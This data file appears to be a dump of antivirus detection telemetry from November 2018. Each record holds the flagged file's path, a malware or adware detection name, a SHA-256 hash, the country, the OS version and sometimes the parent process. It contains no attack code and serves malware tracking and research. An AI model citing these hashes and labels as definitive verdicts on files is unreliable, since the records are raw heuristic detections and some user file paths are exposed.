 [Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:02:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='al-kalam.exe', filepath='E:\\BACKUP\\MY DOCUMENT\\Al Kalam-Al Quran Full+Tajwid\\Al-Kalam.exe', filesize=1536000, name='W32/Chir.B.#M1.#R1'), hash='13dc9e41a0fcef6e324552a40a0a0a15d7efa42975092e2c28227ec3c23aea89', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T09:51:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:19:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='animtrigger.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\animtrigger\\animtrigger.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2593ba0a28981e3448337a8e2379014eaefb919a6c4272bed565c82b425f30f9', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\1DEBB93DB3C877B426D5B68A2574174410142B3B334DBD91F959D48322DFAB6D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1debb93db3c877b426d5b68a2574174410142b3b334dbd91f959d48322dfab6d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:18:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:40:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='need for speed the run.exe', filepath='C:\\Program Files (x86)\\Need For Speed The Run\\Need For Speed The Run.exe', filesize=7808000, name='W32/Virut.Gen.#M1.#R1'), hash='6b29dfb7c7c4dfe2919e997510c9d39000b5c56ec90113d7067ffecba1619c65', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ZA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:40:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='epsdneul.exe', filepath='D:\\SERVER_BENGKEL\\1.ADMBENG\\EPSON\\Apps\\DownloadNavigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='378e3c19e7cfcc8a5ea55ba2e8bf7e459b39eb818e4f7beb309c236a4b0c1f59', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:05:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:52:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233730-35e656bf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_895e5944\\AVSCAN-20181102-231658-9FA99280\\AVSCAN-20181102-233730-35E656BF', filesize=212000, name='PUA/OptimizerPro.Gen.#M300.#R6073'), hash='2a33ac6bc880560eada16c962b64dd9835ad890bda09f8d14095db0882703f16', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:37:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T18:39:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:33:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ft3c7kos0.exe', filepath='C:\\Program Files\\V08BZHM77U\\FT3C7KOS0.exe', filesize=768000, name='TR/Dropper.Gen.#M300.#R4133'), hash='01b70e2e06a50fee1d5ce045d53f60d475ee26f638bfdbd3d3015f8cdba2b6e7', metadata=Row(cmdline=None, country='ET', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:25:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-195503-7cae06df', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_542b38a0\\AVSCAN-20181102-195436-78F1B2EB\\AVSCAN-20181102-195503-7CAE06DF', filesize=1788000, name='SPR/HackTool.057fa6.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:55:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0000987.exe', filepath='d:\\system volume information\\_restore{807891d8-bf67-433d-a2c8-705945a4f07a}\\rp3\\A0000987.EXE', filesize=64000, name='W32/Ramnit.C.#M1.#R1'), hash='5b9f064750cb4005ed7c1499cfec17a44dc713a885e0dea3e0160e6e67a25872', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:32:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avr-c++.exe', filepath='C:\\Program Files\\arduino-nightly-windows\\arduino-nightly\\hardware\\tools\\avr\\bin\\avr-c++.exe', filesize=832000, name='W32/Sality.AT.#M1.#R1'), hash='0faaff548338c98a2259dd3f448a1d1e7aac1ee6b23920aab264af493931a4a8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:2\\\\\\/I7YfiU30u12FoH.1', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=37096, timestamp='2018-11-02T09:57:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline=None, country='PS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sync.exe', filepath='C:\\Users\\pr\\AppData\\Roaming\\13FD57~1\\sync.exe', filesize=2112000, name='Adware/DealPly.676f9c.#M1.#R1'), hash='676f9c2643954a348f02805641c525fb2a86d7840381d15949684d202f492c4a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T16:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wspsetup.exe', filepath='F:\\00\\__DATEN von 2015 bis 2017 12\\2018\\2018 06\\wspsetup.exe', filesize=4608000, name='PUA/GT32SupportGeeks.DM.#M1.#R1'), hash='408ce33176d6d102638423855a95bc325cdc515bdc2622bca6cf79f4f6e35f8a', metadata=Row(cmdline='-r', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Free 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-02T00:05:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-194131-0cbf8872', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6b11b1ca\\AVSCAN-20181102-193217-BF7EF458\\AVSCAN-20181102-194131-0CBF8872', filesize=5440000, name='WORM/Lodbak.Gen.#M1.#R1'), hash='228bb4b4b836a185f7a3b5ba2fce102975c759ef502bd25169ec90fd18f6ff04', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:42:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='templates.bat', filepath='C:\\Users\\X\\Documents\\Corel\\Content X6\\Templates\\Templates.bat', filesize=512000, name='TR/Drop.Agent.cpg.#M1.#R1'), hash='0d20ee5ac1e8c31329221f09fab4a4350258c2c82cf66133e3941c823fbc3a12', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:37:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Desktop\\sdfewrwe\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='NP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\sdfewrwe\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T03:19:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:30:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-032340-6e33d2ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-032340-6E33D2AE', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='328fbbeb694428d090ff636b4a94c2528138cd1cc8f3c6766684699d8552e6ae', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:25:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:54:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='crack-corel-videostudio-x4.exe', filepath='D:\\Downloads\\Downloads\\Crack-Corel-VideoStudio-X4.exe', filesize=512000, name='TR/Dropper.MSIL.xtzvi.#M1.#R1'), hash='0741eff5f96e52fb7123481fb8e100b175f7cd440eb8b54c767bf5a338db60f6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T18:48:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:39:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='savedgames.exe', filepath='I:\\ألعاب\\Games 1\\بليردو\\RECOIL\\savedgames\\savedgames.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='0e501d89fea3ac71248a3c85031911d5e6978a8377684cbeae3f3fecf33f52f6', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:41:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='1b481de0fcc213f8f8a881cc26e76c0310da9b046ed365460119fa90cfee23c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:23:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120446-2bff2557', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120446-2BFF2557', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181103-005852-cfb22bfc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8d24877d\\AVSCAN-20181103-005613-C00024DA\\AVSCAN-20181103-005852-CFB22BFC', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='c13e657201f971525f3e332ed19709e08761e44b', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\c13e657201f971525f3e332ed19709e08761e44b', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='0881009cce1aee3cc0b77a43b743abd2873b22b9dff2b397538854c8b47ffce1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-151337-f83bde70', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_058a7ebc\\AVSCAN-20181102-151255-F305A378\\AVSCAN-20181102-151337-F83BDE70', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:11:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0125996.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0125996.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:50:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061210-3469667f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061210-3469667F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061958-4b0d3d2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061958-4B0D3D2F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050708-1e866f15', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050708-1E866F15', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-231126-cf50a8f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d9d377eb\\AVSCAN-20181102-230818-BD5B29E2\\AVSCAN-20181102-231126-CF50A8F3', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:13:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061927-38aee51d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061927-38AEE51D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053942-aac50eb5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053942-AAC50EB5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054606-901ffc14', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054606-901FFC14', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T02:58:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T121502-01259/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T06:55:05Z'), dt=datetime.date(2018, 11, 2)),
